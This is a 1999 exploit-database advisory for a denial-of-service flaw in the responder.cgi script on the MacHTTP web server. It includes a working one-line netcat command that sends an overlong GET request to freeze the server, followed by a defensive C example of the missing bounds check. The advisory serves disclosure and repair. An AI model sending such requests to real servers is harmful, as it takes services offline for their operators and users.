John O'Fallon Responder.cgi 1.0 DoS Vulnerability

1999-04-09T00:00:00
ID EDB-ID:21048
Type exploitdb
Reporter Epic
Modified 1999-04-09T00:00:00

Description

John O'Fallon Responder.cgi 1.0 DoS Vulnerability. DoS exploit for the CGI platform.

                                        
source: http://www.securityfocus.com/bid/3155/info

'responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products.

Improper bounds checking in 'responder.cgi' makes it possible to cause a denial of service against the MacHTTP webserver: HTTP GET requests with an excessive number of characters will cause the server to freeze.

The webserver will need to be restarted to regain normal functionality. 

$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80
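
The bounds check the description says is missing, as an added example (not responder.cgi's source, which this page does not show): the query is measured against a fixed limit and refused with 414 before any byte is copied, and the percent-decoder never writes past its buffer. `load_query`, `hexval` and `QUERY_MAX` are hypothetical names, 256 is an assumed limit, and reading the query from `QUERY_STRING` assumes an RFC 3875 style CGI environment; the page does not say how MacHTTP hands the request to the script.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define QUERY_MAX 256 /* assumed limit; size it to what the script needs */

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decode qs into dst (dstsz bytes) and return the HTTP status to
 * answer with: 200 accepted, 400 missing or malformed, 414 too long.
 * Never writes past dst[dstsz - 1]; dst is left empty on rejection. */
int load_query(const char *qs, char *dst, size_t dstsz) {
    size_t n = 0, in = 0, out = 0;
    if (dst == NULL || dstsz == 0) return 400;
    dst[0] = '\0';
    if (qs == NULL) return 400;
    /* Measure first, giving up at the limit instead of scanning it all. */
    while (qs[n] != '\0')
        if (++n > QUERY_MAX) return 414;
    while (qs[in] != '\0') {
        int c = (unsigned char)qs[in++];
        if (out + 1 >= dstsz) { dst[0] = '\0'; return 414; }
        if (c == '+') c = ' ';
        else if (c == '%') {
            int hi = hexval((unsigned char)qs[in]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)qs[in + 1]);
            /* Reject truncated or non-hex escapes and an embedded NUL. */
            if (lo < 0 || (hi == 0 && lo == 0)) { dst[0] = '\0'; return 400; }
            c = hi * 16 + lo;
            in += 2;
        }
        dst[out++] = (char)c;
    }
    dst[out] = '\0';
    return 200;
}

int main(void) {
    char query[QUERY_MAX + 1];
    /* Assumption: RFC 3875 style CGI, query passed in QUERY_STRING. */
    int status = load_query(getenv("QUERY_STRING"), query, sizeof query);
    if (status != 200) printf("Status: %d %s\r\n", status, status == 414 ? "URI Too Long" : "Bad Request");
    printf("Content-Type: text/plain\r\n\r\n%d, %zu query bytes kept\r\n", status, strlen(query));
    return 0;
}
```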